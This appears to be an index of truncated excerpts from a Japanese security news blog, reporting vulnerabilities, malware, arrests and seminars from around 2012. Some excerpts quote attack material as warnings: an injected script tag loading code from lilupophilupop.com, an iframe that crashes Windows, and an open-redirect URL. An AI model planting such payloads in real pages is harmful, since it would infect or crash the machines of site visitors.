「xS」「Yoshioka」「Yui」と名乗る17歳の少年がオランダ最大の通信事業者KPNへのハッキングで逮捕されています。警察は暗号化されたコンピュータ、2台のラップトップ、ストレージやDVD、USBメモリなどを押収しているとのこと。 KPNでは数百台のサーバーにイ…

Stuxnetに似たマルウェアの「DuQu」が謎の言語で開発されていると話題になっていましたが、多くの研究者の助けによって解明したそうです。 DuQuがC&Cサーバーとの通信に使っている言語は、Microsoft Visual Studio Compiler 2008でコンパイルされたC言語の特…

先日公開されたばかりのリモートデスクトップの緊急レベルの脆弱性を狙ったPoCが公開されています。 http://pastie.org/private/feg8du0e9kfagng4rrg このPoCではWindows XPおよびWindows Server 2003に対して実行すると、Blue Screen of Death (BSoD)の状態…

Webアプリケーションのセキュリティ改善をテーマとした非営利団体 OWASP（The Open Web Application Security Project）の日本支部 OWASP JAPAN チャプターは、Webアプリケーションセキュリティについてのセミナー「OWASP JAPAN Local Chapter Meeting 1st.…

お隣の韓国では小学生らがゲーム規制に反発して政府サイトにDDoS攻撃を加えるぐらい、手軽で効果的な攻撃と言えばDDoSの時代のようですね。そんなDDoS攻撃も大量アクセスの力業だけではなく、脆弱性を利用してDoSを仕掛けることもあります。 DDoS軽減ベンダ…

ペネトレーションテスト系Linuxの定番 BackTrack5 に R2がリリースです。新しいツールもいくつか増えてますね。 http://www.backtrack-linux.org/ 増えたツールやアップグレードなどについてはこちら BackTrack 5 R2 Released

ニューヨーク・タイムズの記事によると、いまや世界中から参照されているGoogleマップですが、その国境線の引き方によっては紛争が再燃するかもしれない、もしくはすでに起きている戦争の原因かもしれないとのことです。 The First Google Maps War - NYTime…

犯罪者がマルウェアに感染させ、ボットにして操れるようにしたホストを使って、どうお金にするかという話です。これまではスパムやDDoS攻撃の代行サービスはよく耳にしていましたが、SNSのマーケティングのためにも使われているようです。以下は、そのサービ…

2000人の調査結果によると、50％は1日に4つの異なるパスワードを思い出す必要があり、21.6％は8つ以上のパスワードを思い出す必要があるそうです。 企業のセキュリティポリシーなどによって、53.5％はそれらのパスワードを定期的に変更することを要求され、…

古くからあり、未だに絶えることのないパスワード攻撃ですが、それでもユーザーが強いパスワードを作って、それを使ってくれることは期待できません。 Googleは長期的にはOpenIDを広めたいようですが、それが叶うのはまだ先の話だということで、Chromeブラウ…

2月28日(火)にSCSK主催、IBM共催の『緊急開催！サイバー攻撃の動向と対策セミナー〜セキュリティスペシャリストから学ぶ最新セキュリティ事情〜』にて基調講演を『最新のサイバー攻撃動向』というテーマで務めさせて頂きます。 内容は、標的型攻撃、Webへの…

Facebookはよく詐欺やスパムのターゲットになっていて、そのために偽アカウントが作られることもあります。そんな攻撃者などが作成した偽アカウントの特徴を、Barracuda Labsが2884のアクティブユーザーから分析しています。 偽アカウントの60％はバイセクシ…

Wordpress3.2.1の脆弱性を狙ったマルウェアが拡がっているそうで、ここ数日で数百のサイトが攻撃で感染しているとのこと。 攻撃が成功した場合、UploadsフォルダにHTMLページがアップロードされ、マルウェアの感染を自動化するPhoenix Exploit Kitのページに…

Symantec社から各種製品の2006年のソースコードが奪われた事件に起因した、セキュリティの警告が出ています。 その中でも「pcAnywhere」というリモートアクセスのソフトウェアは、中間者攻撃を受けたり、盗聴されるなどの可能性があり、危険なため使用を停止…

Stuxnet以来、SCADAシステムのセキュリティが注目されていますが、Reid Wightman氏を始めとしたベースキャンプチームが6社のSCADAシステムのセキュリティ調査を行いました。 調査対象となたシステムは5社7製品で下記のとおり。 Control Microsystems SCADAPa…

NSA（国家安全保障局）は、Android Security Enhanced (SE)の最初のバージョンをリリースしました。 このシステムはAndroidのセキュリティホールの影響を最小限に抑えるように設計されたシステムで、Androidの中でSELinuxが使えるそうです。SELinuxがAndroid…

任意のURLにリダイレクトできるオープンリダイレクタの状態になっていたようです。一見、GoogleなどのURLに見えますが、攻撃者が指定したサイトに自動的に遷移してしまいます。 Google https://accounts.google.com/o/oauth2/auth?redirect_uri=http://www.s…

GoogleはChromeブラウザの最新ベータ版に、ユーザーがWebサイトから悪意のあるソフトウェアをダウンロードしようとするときに警告する機能を搭載しました。 ダウンロードした実行可能ファイル（.exeや.msiなど）に含まれるマルウェアを分析するための拡張機…

Apache Struts2 (脆弱性を攻撃するPoCが公開されています。リモートからのコマンド実行など重大なものもあります。 Apache Struts2 Ver.2.3.1.1で修正されているので、要アップデートです。 Apache Struts2 <= 2.3.1 Multiple Vulnerabilities

元日の読売1面記事になった割には、国内でもあまり騒がれていない防衛省の対サイバー兵器のニュース（防衛省が対サイバー兵器、攻撃を逆探知し無力化 : 社会 : YOMIURI ONLINE（読売新聞））ですが、海外の反応も地味なものです。 The Hacker News (THN)が「…

Wordpress最新版のVer.3.3にクロスサイト・スクリプティング（XSS）が発見されました。 今のところ0-dayのようで、PoCも公開されまくっています。運用されている方はご注意を。 An Old man lab0ratory: Wordpress 3.3 XSS vulnerability

ISC(Internet Storm Center)のレポートによると、lilupophilupop.comへのリンクを埋め込むSQLインジェクション攻撃の被害がおよそ100万サイトで確認されています。 攻撃されると以下の文字列を挿入されているのが確認できるとのこと。 "> "></title><script src="http://lilupophilupop.com/sl.php"></script> - Google 検索 …

毎年1月1日は著作権の期限が切れる瞬間を祝う Public Domain Dayです。 書籍やフィルム、写真、楽曲に至るまで誰もが自由に使えるようになる日です。今年著作権が切れるのは、海外では、Louis Brandeis, James Joyce, Virginia Woolfなど名前が挙がっていま…

情報化白書委員会をさせていただいた「情報化白書2012」の発刊を記念したシンポジウムにて、パネル「生活情報化とセキュリティ」で登壇させて頂きます。 2012年2月15日（水） 13：30〜17：00（受付開始13：00） TKP大阪梅田ビジネスセンター カンファレンス…

Wi-FiのWPA/WPA2で簡単・安全に設定できる仕組みとして使われているWPS（Wi-Fi Protected Setup）のPIN（暗証番号）がブルートフォースアタックで簡単に解読できてしまう脆弱性があるとのこと。（US-CERT Vulnerability Note VU#723755 - WiFi Protected Set…

64ビット版Windows7のSafari経由で罠を仕込んだIFRAMEタグを表示するだけで、ブルースクリーン（BSoD）状態になるようです。これはSafariの脆弱性ではなく、Windowsカーネルモードドライバー win32k.sysの問題とのこと。 <iframe height='18082563'></iframe> window.twttr = (function(d, s, id…

この1年は事件がありすぎて記憶の彼方かもしれませんが、アメリカの歴史の中でも最大の機密情報不正開示だと言われている、Wikileaksへの外交公電の漏えい事件が去年の11月末ごろにありました。その犯人と言われている米国陸軍のブラッドリー・マニング氏は…

盗まれたiPhone4Sをリモートワイプ機能でAppleIDのパスワード変更などをしたそうですが、iMessegeを送ると新しい端末と盗まれた古い端末の両方に送られて、盗品を買ってしまった人宛にもメッセージが届いたとのこと。 UDIDという端末の識別子がサーバー側で…

HTML5のセキュリティレポート（英語）が公開されています。今後注目の分野ですね。 レポートには以下のことについて書かれています。 Cross-Origin Resource Sharing (CORS) Web Storage オフラインWebアプリケーション Web Messaging カスタムプロトコル（…

スマートフォンのキー入力やSMSメッセージ、Web閲覧履歴、場所などの情報が収集されるとして、大騒ぎになっているCarrier IQですが、自分のAndroidに入っているかどうか心配になりますよね。 インストールするだけで簡単にCarrier IQが入っているかどうか検…